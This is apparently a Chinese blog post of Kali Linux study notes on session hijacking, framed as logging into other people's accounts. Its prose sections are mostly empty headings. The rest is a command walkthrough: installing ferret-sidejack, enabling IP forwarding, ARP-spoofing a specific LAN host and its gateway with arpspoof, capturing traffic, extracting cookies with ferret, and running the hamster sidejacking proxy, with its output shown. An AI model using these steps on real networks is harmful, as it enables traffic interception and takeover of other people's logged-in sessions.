茴香豆安全 - KALI学习笔记

茴香豆安全 - 会话劫持,登录别人的账号

2020-05-24  本文已影响0人  wycdavid

一、前言

二、相关工具准备

apt-get install ferret-sidejack

我之前莫名奇妙的装了一个ferret的同名工具,一直不能用还觉得很奇怪,正确的名称是ferret-sidejack;
另外如果安装失败,考虑先执行下面的命令,因为这个工具貌似是只有32位的,你的kali如果是64位的需要开启 32位支持

dpkg --add-architecture i386
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

三、流程方案简述

四、具体测试过程

1. 第一种方案

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.31.45 192.168.31.1
wireshark
image.png
ferret -r cookie.pcap

2. 第二种方案

ferret  -i eth0
root@kali:~# hamster
--- HAMPSTER 2.0 side-jacking tool ---
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
begining thread
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234

五、最后

上一篇 下一篇

猜你喜欢

热点阅读